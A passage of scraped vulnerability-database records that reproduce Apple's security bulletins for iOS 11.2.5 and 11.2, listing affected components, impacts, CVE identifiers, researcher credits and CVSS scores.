Lee, MinSik Shin and Taekyoung Kwon of the Information Security Lab, Yonsei University\n\nEntry updated November 16, 2018\n\n**Core Bluetooth**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4087: Rani Idan (@raniXCH) of Zimperium zLabs Team\n\nCVE-2018-4095: Rani Idan (@raniXCH) of Zimperium zLabs Team\n\n**Graphics Driver**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4109: Adam Donenfeld (@doadam) of the Zimperium zLabs Team\n\nEntry added February 8, 2018\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read restricted memory\n\nDescription: A memory initialization issue was addressed with improved memory handling.\n\nCVE-2018-4090: Jann Horn of Google Project Zero\n\nEntry updated November 16, 2018\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read restricted memory\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2018-4092: Stefan Esser of Antid0te UG\n\nEntry updated November 16, 2018\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4082: Russ Cox of Google\n\nEntry updated November 16, 2018\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2018-4093: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4189: an anonymous researcher\n\nEntry added May 2, 2018\n\n**LinkPresentation**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A resource exhaustion issue was addressed with improved input validation.\n\nCVE-2018-4100: Abraham Masri @cheesecakeufo\n\nEntry updated November 16, 2018\n\n**QuartzCore**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the processing of web content. This issue was addressed with improved input validation.\n\nCVE-2018-4085: Ret2 Systems Inc. working with Trend Micro's Zero Day Initiative\n\nEntry updated November 16, 2018\n\n**Security**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A certificate may have name constraints applied incorrectly\n\nDescription: A certificate evaluation issue existed in the handling of name constraints. This issue was addressed with improved trust evaluation of certificates.\n\nCVE-2018-4086: Ian Haken of Netflix\n\nEntry updated November 16, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4088: Jeonghoon Shin of Theori\n\nCVE-2018-4089: Ivan Fratric of Google Project Zero\n\nCVE-2018-4096: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4147: found by OSS-Fuzz\n\nEntry added October 18, 2018\n\n**WebKit Page Loading**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7830: Jun Kokatsu (@shhnjk)\n\nEntry added October 18, 2018\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: November 17, 2018\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-23T00:00:00", "type": "apple", "title": "About the security content of iOS 11.2.5", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7830", "CVE-2018-4082", "CVE-2018-4085", "CVE-2018-4086", "CVE-2018-4087", "CVE-2018-4088", "CVE-2018-4089", "CVE-2018-4090", "CVE-2018-4092", "CVE-2018-4093", "CVE-2018-4094", "CVE-2018-4095", "CVE-2018-4096", "CVE-2018-4100", "CVE-2018-4109", "CVE-2018-4147", "CVE-2018-4189"], "modified": "2018-01-23T00:00:00", "id": "APPLE:8FC64D87332A07DF7D3C1D795D21F5B8", "href": "https://support.apple.com/kb/HT208463", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:44:45", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iOS 11.2.5\n\nReleased January 23, 2018\n\n**Audio**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4094: Mingi Cho, Seoyoung Kim, Young-Ho Lee, MinSik Shin and Taekyoung Kwon of the Information Security Lab, Yonsei University\n\nEntry updated November 16, 2018\n\n**Core Bluetooth**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4087: Rani Idan (@raniXCH) of Zimperium zLabs Team\n\nCVE-2018-4095: Rani Idan (@raniXCH) of Zimperium zLabs Team\n\n**Graphics Driver**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4109: Adam Donenfeld (@doadam) of the Zimperium zLabs Team\n\nEntry added February 8, 2018\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read restricted memory\n\nDescription: A memory initialization issue was addressed with improved memory handling.\n\nCVE-2018-4090: Jann Horn of Google Project Zero\n\nEntry updated November 16, 2018\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read restricted memory\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2018-4092: Stefan Esser of Antid0te UG\n\nEntry updated November 16, 2018\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4082: Russ Cox of Google\n\nEntry updated November 16, 2018\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2018-4093: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4189: an anonymous researcher\n\nEntry added May 2, 2018\n\n**LinkPresentation**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A resource exhaustion issue was addressed with improved input validation.\n\nCVE-2018-4100: Abraham Masri @cheesecakeufo\n\nEntry updated November 16, 2018\n\n**QuartzCore**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the processing of web content. This issue was addressed with improved input validation.\n\nCVE-2018-4085: Ret2 Systems Inc. working with Trend Micro's Zero Day Initiative\n\nEntry updated November 16, 2018\n\n**Security**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A certificate may have name constraints applied incorrectly\n\nDescription: A certificate evaluation issue existed in the handling of name constraints. This issue was addressed with improved trust evaluation of certificates.\n\nCVE-2018-4086: Ian Haken of Netflix\n\nEntry updated November 16, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4088: Jeonghoon Shin of Theori\n\nCVE-2018-4089: Ivan Fratric of Google Project Zero\n\nCVE-2018-4096: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4147: found by OSS-Fuzz\n\nEntry added October 18, 2018\n\n**WebKit Page Loading**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7830: Jun Kokatsu (@shhnjk)\n\nEntry added October 18, 2018\n", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-11-17T12:29:10", "title": "About the security content of iOS 11.2.5 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4100", "CVE-2018-4092", "CVE-2018-4082", "CVE-2018-4147", "CVE-2018-4087", "CVE-2018-4093", "CVE-2018-4095", "CVE-2018-4086", "CVE-2018-4088", "CVE-2018-4094", "CVE-2018-4096", "CVE-2018-4109", "CVE-2018-4089", "CVE-2018-4090", "CVE-2017-7830", "CVE-2018-4085", "CVE-2018-4189"], "modified": "2018-11-17T12:29:10", "id": "APPLE:HT208463", "href": "https://support.apple.com/kb/HT208463", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:41:20", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iOS 11.2\n\nReleased December 2, 2017\n\n**App Store**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An attacker in a privileged network position may be able to spoof password prompts in App Store\n\nDescription: An input validation issue was addressed through improved input validation.\n\nCVE-2017-7164: Jerry Decime\n\nEntry added January 11, 2018\n\n**Auto Unlock**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-13905: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**Calculator**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An attacker with a privileged network position may be able to alter currency conversion rates\n\nDescription: Exchange rates were retrieved from HTTP rather than HTTPS. This was addressed by enabling HTTPS for exchange rates.\n\nCVE-2017-2411: Richard Shupak (linkedin.com/in/rshupak), Seth Vargo (@sethvargo) of Google, and an anonymous researcher\n\nEntry added May 2, 2018, updated June 14, 2018\n\n**CFNetwork Session**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreAnimation**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7171: 360 Security working with Trend Micro's Zero Day Initiative, and Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreFoundation**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-7151: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**IOKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: Multiple memory corruption issues were addressed through improved state management.\n\nCVE-2017-13847: Ian Beer of Google Project Zero\n\nEntry updated January 10, 2018\n\n**IOKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7162: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added December 21, 2017, updated January 10, 2018\n\n**IOMobileFrameBuffer**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13879: Apple\n\nEntry updated October 24, 2018\n\n**IOSurface**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13861: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13904: Kevin Backhouse of Semmle Ltd.\n\nEntry added February 14, 2018\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read kernel memory (Meltdown)\n\nDescription: Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.\n\nCVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of Graz University of Technology; Michael Schwarz of Graz University of Technology; Daniel Gruss of Graz University of Technology; Thomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus Technology GmbH; Stefan Mangard of Graz University of Technology; Paul Kocher; Daniel Genkin of University of Pennsylvania and University of Maryland; Yuval Yarom of University of Adelaide and Data61; and Mike Hamburg of Rambus (Cryptography Research Division)\n\nEntry added January 4, 2018, updated January 10, 2018\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13862: Apple\n\nCVE-2017-13867: Ian Beer of Google Project Zero\n\nCVE-2017-13876: Ian Beer of Google Project Zero\n\nEntry updated December 21, 2017\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2017-7173: Brandon Azad\n\nEntry updated August 1, 2018\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read restricted memory\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13855: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read restricted memory\n\nDescription: Multiple validation issues were addressed with improved input sanitization.\n\nCVE-2017-13865: Ian Beer of Google Project Zero\n\nCVE-2017-13868: Brandon Azad\n\nCVE-2017-13869: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-7154: Jann Horn of Google Project Zero\n\nEntry added December 21, 2017\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privilege\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13880: Apple\n\nEntry added October 18, 2018\n\n**Mail**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Incorrect certificate is used for encryption\n\nDescription: A S/MIME issue existed in the handling of encrypted email. This issue was addressed through improved selection of the encryption certificate.\n\nCVE-2017-13874: Nicolas Devillard\n\nEntry updated April 9, 2018\n\n**Mail Drafts**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An attacker with a privileged network position may be able to intercept mail\n\nDescription: An encryption issue existed with S/MIME credentials. The issue was addressed with additional checks and user control.\n\nCVE-2017-13860: Michael Weishaar of INNEO Solutions GmbH\n\n**Mail Message Framework**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2017-7152: Oliver Paukstadt of Thinking Objects GmbH (to.com)\n\nEntry added December 21, 2017\n\n**ReplayKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A user may not have control over their screen broadcast\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13888: Dan Niemeyer of Microsoft, Peter Pau (ArcanaArt.com)\n\nEntry added June 21, 2018, updated September 8, 2020\n\n**SafariViewController**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed through improved state management.\n\nCVE-2017-13891: Janne Raiskila (@raiskila)\n\nEntry added June 21, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13885: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7156: Yuan Deng of Ant-financial Light-Year Security Lab\n\nCVE-2017-7157: an anonymous researcher\n\nCVE-2017-13856: Jeonghoon Shin\n\nCVE-2017-13870: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7160: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-13866: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added December 13, 2017, updated May 4, 2018\n\n**Wi-Fi**\n\nAvailable for: iPhone 6s, iPhone 6s Plus, iPhone 6, iPhone 6 Plus, iPhone SE, iPhone 5s, 12.9-inch iPad Pro 1st generation, iPad Air 2, iPad Air, iPad 5th generation, iPad mini 4, iPad mini 3, iPad mini 2, and iPod touch 6th generation \nReleased for iPhone 7 and later and iPad Pro 9.7-inch (early 2016) and later in [iOS 11.1](<https://support.apple.com/kb/HT208222>).\n\nImpact: An attacker in Wi-Fi range may force nonce reuse in WPA multicast/GTK clients (Key Reinstallation Attacks - KRACK)\n\nDescription: A logic issue existed in the handling of state transitions. This was addressed with improved state management.\n\nCVE-2017-13080: Mathy Vanhoef of the imec-DistriNet group at KU Leuven\n\n\n\n## Additional recognition\n\n**WebKit**\n\nWe would like to acknowledge Yi\u011fit Can YILMAZ (@yilmazcanyigit) and Abhinash Jain (@abhinashjain) researcher for their assistance.\n\nEntry added February 14, 2018, updated April 9, 2018\n", "edition": 4, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-09-08T03:53:28", "title": "About the security content of iOS 11.2 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2411", "CVE-2017-13869", "CVE-2017-5754", "CVE-2017-7152", "CVE-2017-13856", "CVE-2017-13866", "CVE-2017-7151", "CVE-2017-13080", "CVE-2017-13865", "CVE-2017-13860", "CVE-2017-13888", "CVE-2017-13880", "CVE-2017-7172", "CVE-2017-7165", "CVE-2017-13904", "CVE-2017-13891", "CVE-2017-7171", "CVE-2017-13855", "CVE-2017-7162", "CVE-2017-13876", "CVE-2017-13870", "CVE-2017-13868", "CVE-2017-7153", "CVE-2017-7156", "CVE-2017-13847", "CVE-2017-7160", "CVE-2017-13884", "CVE-2017-13874", "CVE-2017-13867", "CVE-2017-13879", "CVE-2017-7173", "CVE-2017-13861", "CVE-2017-7154", "CVE-2017-7157", "CVE-2017-13905", "CVE-2017-13885", "CVE-2017-13862", "CVE-2017-7164"], "modified": "2020-09-08T03:53:28", "id": "APPLE:HT208334", "href": "https://support.apple.com/kb/HT208334", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-14T04:14:47", "description": "# About the security content of iOS 11.2\n\nThis document describes the security content of iOS 11.2.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iOS 11.2\n\nReleased December 2, 2017\n\n**App Store**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An attacker in a privileged network position may be able to spoof password prompts in App Store\n\nDescription: An input validation issue was addressed through improved input validation.\n\nCVE-2017-7164: Jerry Decime\n\nEntry added January 11, 2018\n\n**Auto Unlock**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-13905: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**Calculator**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An attacker with a privileged network position may be able to alter currency conversion rates\n\nDescription: Exchange rates were retrieved from HTTP rather than HTTPS. This was addressed by enabling HTTPS for exchange rates.\n\nCVE-2017-2411: Richard Shupak (linkedin.com/in/rshupak), Seth Vargo (@sethvargo) of Google, and an anonymous researcher\n\nEntry added May 2, 2018, updated June 14, 2018\n\n**CFNetwork Session**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreAnimation**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7171: 360 Security working with Trend Micro's Zero Day Initiative, and Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreFoundation**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-7151: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**IOKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: Multiple memory corruption issues were addressed through improved state management.\n\nCVE-2017-13847: Ian Beer of Google Project Zero\n\nEntry updated January 10, 2018\n\n**IOKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved 